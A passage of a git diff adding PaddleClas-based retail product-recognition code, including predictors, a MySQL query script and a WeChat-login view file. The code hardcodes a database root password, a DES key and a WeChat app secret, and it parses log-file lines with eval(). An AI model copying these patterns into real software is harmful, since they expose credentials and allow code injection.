save_dir if SavePreLabel specified.") + self.save_dir = partial(os.path.join, save_dir) + + def __call__(self, x, file_names=None): + if file_names is None: + return + assert x.shape[0] == len(file_names) + for idx, probs in enumerate(x): + index = probs.argsort(axis=0)[-1].astype("int32") + self.save(index, file_names[idx]) + + def save(self, id, image_file): + output_dir = self.save_dir(str(id)) + os.makedirs(output_dir, exist_ok=True) + shutil.copy(image_file, output_dir) + + +class Binarize(object): + def __init__(self, method="round"): + self.method = method + self.unit = np.array([[128, 64, 32, 16, 8, 4, 2, 1]]).T + + def __call__(self, x, file_names=None): + if self.method == "round": + x = np.round(x + 1).astype("uint8") - 1 + + if self.method == "sign": + x = ((np.sign(x) + 1) / 2).astype("uint8") + + embedding_size = x.shape[1] + assert embedding_size % 8 == 0, "The Binary index only support vectors with sizes multiple of 8" + + byte = np.zeros([x.shape[0], embedding_size // 8], dtype=np.uint8) + for i in range(embedding_size // 8): + byte[:, i:i + 1] = np.dot(x[:, i * 8:(i + 1) * 8], self.unit) + + return byte diff --git a/Smart_container/PaddleClas/deploy/python/predict_client.py b/Smart_container/PaddleClas/deploy/python/predict_client.py new file mode 100644 index 0000000..f5dedc1 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/predict_client.py @@ -0,0 +1,157 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import os +import sys + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import copy +import pickle + +import cv2 +import faiss +import numpy as np +import yaml +from utils import config, logger +from utils.draw_bbox import draw_bbox_results +from utils.get_image_list import get_image_list + +from python.predict_det import DetPredictor +from python.predict_rec import RecPredictor + + +class SystemPredictor(object): + def __init__(self, config): + + self.config = config + self.rec_predictor = RecPredictor(config) + self.det_predictor = DetPredictor(config) + + assert 'IndexProcess' in config.keys(), "Index config not found ... " + self.return_k = self.config['IndexProcess']['return_k'] + + index_dir = self.config["IndexProcess"]["index_dir"] + assert os.path.exists(os.path.join( + index_dir, "vector.index")), "vector.index not found ..." + assert os.path.exists(os.path.join( + index_dir, "id_map.pkl")), "id_map.pkl not found ... " + + if config['IndexProcess'].get("binary_index", False): + self.Searcher = faiss.read_index_binary( + os.path.join(index_dir, "vector.index")) + else: + self.Searcher = faiss.read_index( + os.path.join(index_dir, "vector.index")) + + with open(os.path.join(index_dir, "id_map.pkl"), "rb") as fd: + self.id_map = pickle.load(fd) + + def append_self(self, results, shape): + results.append({ + "class_id": 0, + "score": 1.0, + "bbox": + np.array([0, 0, shape[1], shape[0]]), # xmin, ymin, xmax, ymax + "label_name": "foreground", + }) + return results + + def nms_to_rec_results(self, results, thresh=0.1): + filtered_results = [] + x1 = np.array([r["bbox"][0] for r in results]).astype("float32") + y1 = np.array([r["bbox"][1] for r in results]).astype("float32") + x2 = np.array([r["bbox"][2] for r in results]).astype("float32") + y2 = np.array([r["bbox"][3] for r in results]).astype("float32") + scores = np.array([r["rec_scores"] for r in results]) + + areas = (x2 - x1 + 1) * (y2 - y1 + 1) + order = scores.argsort()[::-1] + while order.size > 0: + i = order[0] + xx1 = np.maximum(x1[i], x1[order[1:]]) + yy1 = np.maximum(y1[i], y1[order[1:]]) + xx2 = np.minimum(x2[i], x2[order[1:]]) + yy2 = np.minimum(y2[i], y2[order[1:]]) + + w = np.maximum(0.0, xx2 - xx1 + 1) + h = np.maximum(0.0, yy2 - yy1 + 1) + inter = w * h + ovr = inter / (areas[i] + areas[order[1:]] - inter) + inds = np.where(ovr <= thresh)[0] + order = order[inds + 1] + filtered_results.append(results[i]) + + return filtered_results + + def predict(self, img): + output = [] + # st1: get all detection results + results = self.det_predictor.predict(img) + + # st2: add the whole image for recognition to improve recall + results = self.append_self(results, img.shape) + + # st3: recognition process, use score_thres to ensure accuracy + for result in results: + preds = {} + xmin, ymin, xmax, ymax = result["bbox"].astype("int") + crop_img = img[ymin:ymax, xmin:xmax, :].copy() + rec_results = self.rec_predictor.predict(crop_img) + preds["bbox"] = [xmin, ymin, xmax, ymax] + scores, docs = self.Searcher.search(rec_results, self.return_k) + + # just top-1 result will be returned for the final + if scores[0][0] >= self.config["IndexProcess"]["score_thres"]: + preds["rec_docs"] = self.id_map[docs[0][0]].split()[1] + preds["rec_scores"] = scores[0][0] + output.append(preds) + + # st5: nms to the final results to avoid fetching duplicate results + output = self.nms_to_rec_results( + output, self.config["Global"]["rec_nms_thresold"]) + + return output + + +def main(config): + + system_predictor = SystemPredictor(config) + image_list = get_image_list(config["Global"]["infer_imgs"]) + assert config["Global"]["batch_size"] == 1 + + for idx, image_file in enumerate(image_list): + img = cv2.imread(image_file)[:, :, ::-1] + output = system_predictor.predict(img) + print(output) + draw_bbox_results(img, output, image_file) + + if output==[]: + i = "Please connect root to upload container's name and it's price!" + with open('/root/Smart_container/PaddleClas/dataset/log_client.txt','a+',encoding='utf8') as f: + f.write(str(i)+'\n') + f.close() + else: + for i in output: + with open('/root/Smart_container/PaddleClas/dataset/log_client.txt','a+',encoding='utf8') as f: + f.write(str(i)+'\n') + f.close() + print(i) + return output + + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config(args.config, overrides=args.override, show=True) + main(config) diff --git a/Smart_container/PaddleClas/deploy/python/predict_det.py b/Smart_container/PaddleClas/deploy/python/predict_det.py new file mode 100644 index 0000000..7b23e62 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/predict_det.py @@ -0,0 +1,158 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import os +import sys + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +from utils import logger +from utils import config +from utils.predictor import Predictor +from utils.get_image_list import get_image_list +from det_preprocess import det_preprocess +from preprocess import create_operators + +import os +import argparse +import time +import yaml +import ast +from functools import reduce +import cv2 +import numpy as np +import paddle + + +class DetPredictor(Predictor): + def __init__(self, config): + super().__init__(config["Global"], + config["Global"]["det_inference_model_dir"]) + + self.preprocess_ops = create_operators(config["DetPreProcess"][ + "transform_ops"]) + self.config = config + + def preprocess(self, img): + im_info = { + 'scale_factor': np.array( + [1., 1.], dtype=np.float32), + 'im_shape': np.array( + img.shape[:2], dtype=np.float32), + 'input_shape': self.config["Global"]["image_shape"], + "scale_factor": np.array( + [1., 1.], dtype=np.float32) + } + im, im_info = det_preprocess(img, im_info, self.preprocess_ops) + inputs = self.create_inputs(im, im_info) + return inputs + + def create_inputs(self, im, im_info): + """generate input for different model type + Args: + im (np.ndarray): image (np.ndarray) + im_info (dict): info of image + model_arch (str): model type + Returns: + inputs (dict): input of model + """ + inputs = {} + inputs['image'] = np.array((im, )).astype('float32') + inputs['im_shape'] = np.array( + (im_info['im_shape'], )).astype('float32') + inputs['scale_factor'] = np.array( + (im_info['scale_factor'], )).astype('float32') + + return inputs + + def parse_det_results(self, pred, threshold, label_list): + max_det_results = self.config["Global"]["max_det_results"] + keep_indexes = pred[:, 1].argsort()[::-1][:max_det_results] + results = [] + for idx in keep_indexes: + single_res = pred[idx] + class_id = int(single_res[0]) + score = single_res[1] + bbox = single_res[2:] + if score < threshold: + continue + label_name = label_list[class_id] + results.append({ + "class_id": class_id, + "score": score, + "bbox": bbox, + "label_name": label_name, + }) + return results + + def predict(self, image, threshold=0.5, run_benchmark=False): + ''' + Args: + image (str/np.ndarray): path of image/ np.ndarray read by cv2 + threshold (float): threshold of predicted box' score + Returns: + results (dict): include 'boxes': np.ndarray: shape:[N,6], N: number of box, + matix element:[class, score, x_min, y_min, x_max, y_max] + MaskRCNN's results include 'masks': np.ndarray: + shape: [N, im_h, im_w] + ''' + inputs = self.preprocess(image) + np_boxes = None + input_names = self.paddle_predictor.get_input_names() + + for i in range(len(input_names)): + input_tensor = self.paddle_predictor.get_input_handle(input_names[ + i]) + input_tensor.copy_from_cpu(inputs[input_names[i]]) + + t1 = time.time() + self.paddle_predictor.run() + output_names = self.paddle_predictor.get_output_names() + boxes_tensor = self.paddle_predictor.get_output_handle(output_names[0]) + np_boxes = boxes_tensor.copy_to_cpu() + t2 = time.time() + + print("Inference: {} ms per batch image".format((t2 - t1) * 1000.0)) + + # do not perform postprocess in benchmark mode + results = [] + if reduce(lambda x, y: x * y, np_boxes.shape) < 6: + print('[WARNNING] No object detected.') + results = np.array([]) + else: + results = np_boxes + + results = self.parse_det_results(results, + self.config["Global"]["threshold"], + self.config["Global"]["labe_list"]) + return results + + +def main(config): + det_predictor = DetPredictor(config) + image_list = get_image_list(config["Global"]["infer_imgs"]) + + assert config["Global"]["batch_size"] == 1 + for idx, image_file in enumerate(image_list): + img = cv2.imread(image_file)[:, :, ::-1] + output = det_predictor.predict(img) + print(output) + + return + + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config(args.config, overrides=args.override, show=True) + main(config) diff --git a/Smart_container/PaddleClas/deploy/python/predict_rec.py b/Smart_container/PaddleClas/deploy/python/predict_rec.py new file mode 100644 index 0000000..d41c513 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/predict_rec.py @@ -0,0 +1,105 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import os +import sys + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import cv2 +import numpy as np + +from utils import logger +from utils import config +from utils.predictor import Predictor +from utils.get_image_list import get_image_list +from preprocess import create_operators +from postprocess import build_postprocess + + +class RecPredictor(Predictor): + def __init__(self, config): + super().__init__(config["Global"], + config["Global"]["rec_inference_model_dir"]) + self.preprocess_ops = create_operators(config["RecPreProcess"][ + "transform_ops"]) + self.postprocess = build_postprocess(config["RecPostProcess"]) + + def predict(self, images, feature_normalize=True): + input_names = self.paddle_predictor.get_input_names() + input_tensor = self.paddle_predictor.get_input_handle(input_names[0]) + + output_names = self.paddle_predictor.get_output_names() + output_tensor = self.paddle_predictor.get_output_handle(output_names[ + 0]) + + if not isinstance(images, (list, )): + images = [images] + for idx in range(len(images)): + for ops in self.preprocess_ops: + images[idx] = ops(images[idx]) + image = np.array(images) + + input_tensor.copy_from_cpu(image) + self.paddle_predictor.run() + batch_output = output_tensor.copy_to_cpu() + + if feature_normalize: + feas_norm = np.sqrt( + np.sum(np.square(batch_output), axis=1, keepdims=True)) + batch_output = np.divide(batch_output, feas_norm) + + if self.postprocess is not None: + batch_output = self.postprocess(batch_output) + return batch_output + + +def main(config): + rec_predictor = RecPredictor(config) + image_list = get_image_list(config["Global"]["infer_imgs"]) + + batch_imgs = [] + batch_names = [] + cnt = 0 + for idx, img_path in enumerate(image_list): + img = cv2.imread(img_path) + if img is None: + logger.warning( + "Image file failed to read and has been skipped. The path: {}". + format(img_path)) + else: + img = img[:, :, ::-1] + batch_imgs.append(img) + img_name = os.path.basename(img_path) + batch_names.append(img_name) + cnt += 1 + + if cnt % config["Global"]["batch_size"] == 0 or (idx + 1) == len(image_list): + if len(batch_imgs) == 0: + continue + + batch_results = rec_predictor.predict(batch_imgs) + for number, result_dict in enumerate(batch_results): + filename = batch_names[number] + print("{}:\t{}".format(filename, result_dict)) + batch_imgs = [] + batch_names = [] + + return + + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config(args.config, overrides=args.override, show=True) + main(config) diff --git a/Smart_container/PaddleClas/deploy/python/predict_system.py b/Smart_container/PaddleClas/deploy/python/predict_system.py new file mode 100644 index 0000000..18297d8 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/predict_system.py @@ -0,0 +1,155 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import os +import sys + +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../'))) + +import copy +import pickle + +import cv2 +import faiss +import numpy as np +import yaml +from utils import config, logger +from utils.draw_bbox import draw_bbox_results +from utils.get_image_list import get_image_list + +from python.predict_det import DetPredictor +from python.predict_rec import RecPredictor + + +class SystemPredictor(object): + def __init__(self, config): + + self.config = config + self.rec_predictor = RecPredictor(config) + self.det_predictor = DetPredictor(config) + + assert 'IndexProcess' in config.keys(), "Index config not found ... " + self.return_k = self.config['IndexProcess']['return_k'] + + index_dir = self.config["IndexProcess"]["index_dir"] + assert os.path.exists(os.path.join( + index_dir, "vector.index")), "vector.index not found ..." + assert os.path.exists(os.path.join( + index_dir, "id_map.pkl")), "id_map.pkl not found ... " + + if config['IndexProcess'].get("binary_index", False): + self.Searcher = faiss.read_index_binary( + os.path.join(index_dir, "vector.index")) + else: + self.Searcher = faiss.read_index( + os.path.join(index_dir, "vector.index")) + + with open(os.path.join(index_dir, "id_map.pkl"), "rb") as fd: + self.id_map = pickle.load(fd) + + def append_self(self, results, shape): + results.append({ + "class_id": 0, + "score": 1.0, + "bbox": + np.array([0, 0, shape[1], shape[0]]), # xmin, ymin, xmax, ymax + "label_name": "foreground", + }) + return results + + def nms_to_rec_results(self, results, thresh=0.1): + filtered_results = [] + x1 = np.array([r["bbox"][0] for r in results]).astype("float32") + y1 = np.array([r["bbox"][1] for r in results]).astype("float32") + x2 = np.array([r["bbox"][2] for r in results]).astype("float32") + y2 = np.array([r["bbox"][3] for r in results]).astype("float32") + scores = np.array([r["rec_scores"] for r in results]) + + areas = (x2 - x1 + 1) * (y2 - y1 + 1) + order = scores.argsort()[::-1] + while order.size > 0: + i = order[0] + xx1 = np.maximum(x1[i], x1[order[1:]]) + yy1 = np.maximum(y1[i], y1[order[1:]]) + xx2 = np.minimum(x2[i], x2[order[1:]]) + yy2 = np.minimum(y2[i], y2[order[1:]]) + + w = np.maximum(0.0, xx2 - xx1 + 1) + h = np.maximum(0.0, yy2 - yy1 + 1) + inter = w * h + ovr = inter / (areas[i] + areas[order[1:]] - inter) + inds = np.where(ovr <= thresh)[0] + order = order[inds + 1] + filtered_results.append(results[i]) + + return filtered_results + + def predict(self, img): + output = [] + # st1: get all detection results + results = self.det_predictor.predict(img) + + # st2: add the whole image for recognition to improve recall + results = self.append_self(results, img.shape) + + # st3: recognition process, use score_thres to ensure accuracy + for result in results: + preds = {} + xmin, ymin, xmax, ymax = result["bbox"].astype("int") + crop_img = img[ymin:ymax, xmin:xmax, :].copy() + rec_results = self.rec_predictor.predict(crop_img) + preds["bbox"] = [xmin, ymin, xmax, ymax] + scores, docs = self.Searcher.search(rec_results, self.return_k) + + # just top-1 result will be returned for the final + if scores[0][0] >= self.config["IndexProcess"]["score_thres"]: + preds["rec_docs"] = self.id_map[docs[0][0]].split()[1] + preds["rec_scores"] = scores[0][0] + output.append(preds) + + # st5: nms to the final results to avoid fetching duplicate results + output = self.nms_to_rec_results( + output, self.config["Global"]["rec_nms_thresold"]) + + return output + + +def main(config): + + system_predictor = SystemPredictor(config) + image_list = get_image_list(config["Global"]["infer_imgs"]) + + assert config["Global"]["batch_size"] == 1 + for idx, image_file in enumerate(image_list): + img = cv2.imread(image_file)[:, :, ::-1] + output = system_predictor.predict(img) + + draw_bbox_results(img, output, image_file) + if output==[]: + i = "Please connect root to upload container's name and it's price!" + with open('/root/Smart_container/PaddleClas/dataset/log.txt','a+',encoding='utf8') as f: + f.write(str(i)+'\n') + f.close() + else: + for i in output: + with open('/root/Smart_container/PaddleClas/dataset/log.txt','a+',encoding='utf8') as f: + f.write(str(i)+'\n') + f.close() + return output + + +if __name__ == "__main__": + args = config.parse_args() + config = config.get_config(args.config, overrides=args.override, show=True) + main(config) diff --git a/Smart_container/PaddleClas/deploy/python/preprocess.py b/Smart_container/PaddleClas/deploy/python/preprocess.py new file mode 100644 index 0000000..5d7fc92 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/preprocess.py @@ -0,0 +1,337 @@ +""" +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +""" + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function +from __future__ import unicode_literals + +from functools import partial +import six +import math +import random +import cv2 +import numpy as np +import importlib +from PIL import Image + +from python.det_preprocess import DetNormalizeImage, DetPadStride, DetPermute, DetResize + + +def create_operators(params): + """ + create operators based on the config + + Args: + params(list): a dict list, used to create some operators + """ + assert isinstance(params, list), ('operator config should be a list') + mod = importlib.import_module(__name__) + ops = [] + for operator in params: + assert isinstance(operator, + dict) and len(operator) == 1, "yaml format error" + op_name = list(operator)[0] + param = {} if operator[op_name] is None else operator[op_name] + op = getattr(mod, op_name)(**param) + ops.append(op) + + return ops + + +class UnifiedResize(object): + def __init__(self, interpolation=None, backend="cv2"): + _cv2_interp_from_str = { + 'nearest': cv2.INTER_NEAREST, + 'bilinear': cv2.INTER_LINEAR, + 'area': cv2.INTER_AREA, + 'bicubic': cv2.INTER_CUBIC, + 'lanczos': cv2.INTER_LANCZOS4 + } + _pil_interp_from_str = { + 'nearest': Image.NEAREST, + 'bilinear': Image.BILINEAR, + 'bicubic': Image.BICUBIC, + 'box': Image.BOX, + 'lanczos': Image.LANCZOS, + 'hamming': Image.HAMMING + } + + def _pil_resize(src, size, resample): + pil_img = Image.fromarray(src) + pil_img = pil_img.resize(size, resample) + return np.asarray(pil_img) + + if backend.lower() == "cv2": + if isinstance(interpolation, str): + interpolation = _cv2_interp_from_str[interpolation.lower()] + # compatible with opencv < version 4.4.0 + elif not interpolation: + interpolation = cv2.INTER_LINEAR + self.resize_func = partial(cv2.resize, interpolation=interpolation) + elif backend.lower() == "pil": + if isinstance(interpolation, str): + interpolation = _pil_interp_from_str[interpolation.lower()] + self.resize_func = partial(_pil_resize, resample=interpolation) + else: + logger.warning( + f"The backend of Resize only support \"cv2\" or \"PIL\". \"f{backend}\" is unavailable. Use \"cv2\" instead." + ) + self.resize_func = cv2.resize + + def __call__(self, src, size): + return self.resize_func(src, size) + + +class OperatorParamError(ValueError): + """ OperatorParamError + """ + pass + + +class DecodeImage(object): + """ decode image """ + + def __init__(self, to_rgb=True, to_np=False, channel_first=False): + self.to_rgb = to_rgb + self.to_np = to_np # to numpy + self.channel_first = channel_first # only enabled when to_np is True + + def __call__(self, img): + if six.PY2: + assert type(img) is str and len( + img) > 0, "invalid input 'img' in DecodeImage" + else: + assert type(img) is bytes and len( + img) > 0, "invalid input 'img' in DecodeImage" + data = np.frombuffer(img, dtype='uint8') + img = cv2.imdecode(data, 1) + if self.to_rgb: + assert img.shape[2] == 3, 'invalid shape of image[%s]' % ( + img.shape) + img = img[:, :, ::-1] + + if self.channel_first: + img = img.transpose((2, 0, 1)) + + return img + + +class ResizeImage(object): + """ resize image """ + + def __init__(self, + size=None, + resize_short=None, + interpolation=None, + backend="cv2"): + if resize_short is not None and resize_short > 0: + self.resize_short = resize_short + self.w = None + self.h = None + elif size is not None: + self.resize_short = None + self.w = size if type(size) is int else size[0] + self.h = size if type(size) is int else size[1] + else: + raise OperatorParamError("invalid params for ReisizeImage for '\ + 'both 'size' and 'resize_short' are None") + + self._resize_func = UnifiedResize( + interpolation=interpolation, backend=backend) + + def __call__(self, img): + img_h, img_w = img.shape[:2] + if self.resize_short is not None: + percent = float(self.resize_short) / min(img_w, img_h) + w = int(round(img_w * percent)) + h = int(round(img_h * percent)) + else: + w = self.w + h = self.h + return self._resize_func(img, (w, h)) + + +class CropImage(object): + """ crop image """ + + def __init__(self, size): + if type(size) is int: + self.size = (size, size) + else: + self.size = size # (h, w) + + def __call__(self, img): + w, h = self.size + img_h, img_w = img.shape[:2] + + if img_h < h or img_w < w: + raise Exception( + f"The size({h}, {w}) of CropImage must be greater than size({img_h}, {img_w}) of image. Please check image original size and size of ResizeImage if used." + ) + + w_start = (img_w - w) // 2 + h_start = (img_h - h) // 2 + + w_end = w_start + w + h_end = h_start + h + return img[h_start:h_end, w_start:w_end, :] + + +class RandCropImage(object): + """ random crop image """ + + def __init__(self, + size, + scale=None, + ratio=None, + interpolation=None, + backend="cv2"): + if type(size) is int: + self.size = (size, size) # (h, w) + else: + self.size = size + + self.scale = [0.08, 1.0] if scale is None else scale + self.ratio = [3. / 4., 4. / 3.] if ratio is None else ratio + + self._resize_func = UnifiedResize( + interpolation=interpolation, backend=backend) + + def __call__(self, img): + size = self.size + scale = self.scale + ratio = self.ratio + + aspect_ratio = math.sqrt(random.uniform(*ratio)) + w = 1. * aspect_ratio + h = 1. / aspect_ratio + + img_h, img_w = img.shape[:2] + + bound = min((float(img_w) / img_h) / (w**2), + (float(img_h) / img_w) / (h**2)) + scale_max = min(scale[1], bound) + scale_min = min(scale[0], bound) + + target_area = img_w * img_h * random.uniform(scale_min, scale_max) + target_size = math.sqrt(target_area) + w = int(target_size * w) + h = int(target_size * h) + + i = random.randint(0, img_w - w) + j = random.randint(0, img_h - h) + + img = img[j:j + h, i:i + w, :] + + return self._resize_func(img, size) + + +class RandFlipImage(object): + """ random flip image + flip_code: + 1: Flipped Horizontally + 0: Flipped Vertically + -1: Flipped Horizontally & Vertically + """ + + def __init__(self, flip_code=1): + assert flip_code in [-1, 0, 1 + ], "flip_code should be a value in [-1, 0, 1]" + self.flip_code = flip_code + + def __call__(self, img): + if random.randint(0, 1) == 1: + return cv2.flip(img, self.flip_code) + else: + return img + + +class AutoAugment(object): + def __init__(self): + self.policy = ImageNetPolicy() + + def __call__(self, img): + from PIL import Image + img = np.ascontiguousarray(img) + img = Image.fromarray(img) + img = self.policy(img) + img = np.asarray(img) + + +class NormalizeImage(object): + """ normalize image such as substract mean, divide std + """ + + def __init__(self, + scale=None, + mean=None, + std=None, + order='chw', + output_fp16=False, + channel_num=3): + if isinstance(scale, str): + scale = eval(scale) + assert channel_num in [ + 3, 4 + ], "channel number of input image should be set to 3 or 4." + self.channel_num = channel_num + self.output_dtype = 'float16' if output_fp16 else 'float32' + self.scale = np.float32(scale if scale is not None else 1.0 / 255.0) + self.order = order + mean = mean if mean is not None else [0.485, 0.456, 0.406] + std = std if std is not None else [0.229, 0.224, 0.225] + + shape = (3, 1, 1) if self.order == 'chw' else (1, 1, 3) + self.mean = np.array(mean).reshape(shape).astype('float32') + self.std = np.array(std).reshape(shape).astype('float32') + + def __call__(self, img): + from PIL import Image + if isinstance(img, Image.Image): + img = np.array(img) + + assert isinstance(img, + np.ndarray), "invalid input 'img' in NormalizeImage" + + img = (img.astype('float32') * self.scale - self.mean) / self.std + + if self.channel_num == 4: + img_h = img.shape[1] if self.order == 'chw' else img.shape[0] + img_w = img.shape[2] if self.order == 'chw' else img.shape[1] + pad_zeros = np.zeros( + (1, img_h, img_w)) if self.order == 'chw' else np.zeros( + (img_h, img_w, 1)) + img = (np.concatenate( + (img, pad_zeros), axis=0) + if self.order == 'chw' else np.concatenate( + (img, pad_zeros), axis=2)) + return img.astype(self.output_dtype) + + +class ToCHWImage(object): + """ convert hwc image to chw image + """ + + def __init__(self): + pass + + def __call__(self, img): + from PIL import Image + if isinstance(img, Image.Image): + img = np.array(img) + + return img.transpose((2, 0, 1)) diff --git a/Smart_container/PaddleClas/deploy/python/sql.py b/Smart_container/PaddleClas/deploy/python/sql.py new file mode 100644 index 0000000..e9f4ea6 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/sql.py @@ -0,0 +1,24 @@ +import pymysql + +db = pymysql.connect(host="localhost", user="root", passwd="105316", db="goods_identification") +cur = db.cursor() +rec_docs_list='达利园' +containers = [] +price = [] +sqlQuery = " select * from t_goods" +cur.execute(sqlQuery) +result = cur.fetchall() +print(result) +print(len(result)) +print(result[257]) +for s in result: + + if rec_docs_list == s[1]: + print(s[1]) + print(s[2]) + containers.append(s[1]) + price.append(s[2]) +print(price) +db.commit() +cur.close() +db.close() \ No newline at end of file diff --git a/Smart_container/PaddleClas/deploy/python/test.py b/Smart_container/PaddleClas/deploy/python/test.py new file mode 100644 index 0000000..44dd28c --- /dev/null +++ b/Smart_container/PaddleClas/deploy/python/test.py @@ -0,0 +1,383 @@ +#图片处理 +import base64 +import binascii +import hashlib +import json +import os +from typing import Container + +import memcache +import pymysql +import requests +from django.http import JsonResponse +from django.shortcuts import HttpResponse, render +#检索 +from fuzzywuzzy import fuzz, process +#登陆用 +from pyDes import CBC, PAD_PKCS5, des +from xpinyin import Pinyin + +# 数据库相关操作 +from app01 import models + +# Create your views here. + +KEY='mHAxsLYz' #秘钥 +PICTURE_ROOT = '/root/Smart_container/PaddleClas/dataset/retail' + +def des_encrypt(s): + """ + DES 加密 + :param s: 原始字符串 + :return: 加密后字符串,16进制 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + en = k.encrypt(s, padmode=PAD_PKCS5) + return binascii.b2a_hex(en) + + +def des_descrypt(s): + """ + DES 解密 + :param s: 加密后的字符串,16进制 + :return: 解密后的字符串 + """ + secret_key = KEY + iv = secret_key + k = des(secret_key, CBC, iv, pad=None, padmode=PAD_PKCS5) + de = k.decrypt(binascii.a2b_hex(s), padmode=PAD_PKCS5) + sessionID = de.split('_') + openid = sessionID[0] + return openid + + +def SKexpired(old_sessionID, code): + + s_openid = des_descrypt(old_sessionID) + + appid = "wx433732b2940b7d4c" + secret = "b4e95c5b998cd13ba9d09e077343f2e7" + code2SessionUrl = "https://api.weixin.qq.com/sns/jscode2session?appid={appid}&secret={secret}&js_code={code}&grant_type=authorization_code".format( + appid=appid, secret=secret, code=code) + resp = requests.get(code2SessionUrl) + respDict = resp.json() + s_session_key = respDict.get("session_key") + + s = str(s_openid) + '_' +str(s_session_key) + sessionID = des_encrypt(s) + + models.TUser.objects.filter(openid=s_openid).update(session_key=s_session_key) + + return sessionID + + + +def information(): + container = models.TContainer.objects.all() + + container_all = [] + for i in container: + temp = [] + temp.append(i.number) + temp.append(i.container_name) + temp.append(i.container_price) + temp.append(i.picture_address) + container_all.append(temp) + + return container_all + + +def update(): + container_all = information() + + TXT_PATH='/root/Smart_container/PaddleClas/dataset/retail/data_update.txt' + + with open(os.path.abspath(TXT_PATH),'w+',encoding='utf-8') as fh: + + for container_single in container_all: + container_name = container_single[1] + container_address = container_single[3] + + fh.write(container_address + '\t' + container_name + '\n') + fh.close() + #有问题要修改 + os.system('python3 python/build_gallery.py -c configs/build_product.yaml -o IndexProcess.data_file="/root/Smart_container/PaddleClas/dataset/retail/data_update.txt" -o IndexProcess.index_dir="/root/Smart_container/PaddleClas/dataset/retail/index_update"') + + +# 识别模块 +def reference(request): + if request.method == "POST": + sessionID = request.POST.get('sessionID') + isSKexpried = request.POST.get('isSKexpried') + code = request.POST.get('code') + value = request.POST.get('picture') + + res_all = models.TContainer.objects.all() + + if isSKexpried: + sessionID = SKexpired(sessionID, code) + + image_name = base64.b64decode(value) + + print(image_name) + + image_file = '/root/Smart_container/PaddleClas/dataset/retail/test1.jpg' + with open(image_file, "wb") as fh: + fh.write(image_name) + fh.close() + +### 商品识别 + + rec_docs_list = [] + + rec_docs_price_all = [] + + price_all = 0.0 + + # self.picture_file = '/home/thomas/Smart_container/PaddleClas/dataset/retail/test.jpg' + # + # cv2.imwrite(self.picture_file, self.image) + + os.system( + 'python /root/Smart_container/PaddleClas/deploy/python/predict_system.py -c /root/Smart_container/PaddleClas/deploy/configs/inference_product.yaml -o Global.use_gpu=False') + print('3') + log_path = '/root/Smart_container/PaddleClas/dataset/log.txt' + + + rec_docs_str = '' + rec_deplay_str = '' + + with open(log_path, 'r', encoding='utf8') as F: + + str_result_list = F.readlines() + print(str_result_list) + + if str_result_list[0] == "Please connect root to upload container's name and it's price!": + + rec_deplay_str_all = str_result_list[0] + + else: + + for str_result in str_result_list: + + price_all = 0 + + rec_docs_price = [] + + dict_result = eval(str_result) + + rec_docs = dict_result['rec_docs'] # 结果 + rec_docs_list.append(rec_docs) + print('2') + print(rec_docs_list) + for res in res_all: + for rec_docs_sig in rec_docs_list: + if rec_docs_sig == res.container_name: + rec_price = res.container_price + price_all += float(rec_price) + rec_docs_price.append(rec_docs) + 